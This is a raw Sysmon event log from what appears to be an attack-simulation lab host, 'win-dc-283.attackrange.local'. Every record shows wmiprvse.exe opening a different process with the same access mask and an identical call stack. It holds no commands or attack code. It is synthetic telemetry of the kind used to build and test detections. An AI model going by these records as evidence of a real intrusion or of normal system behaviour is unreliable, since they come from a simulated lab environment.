15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3C06-00000000A301}5376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023787Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3B06-00000000A301}6204C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023786Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3A06-00000000A301}7660C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023785Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023784Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023783Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023782Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023781Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023780Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023779Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023778Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023777Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023776Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023775Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023774Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023773Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023772Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023771Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023770Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023769Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.648{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023768Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 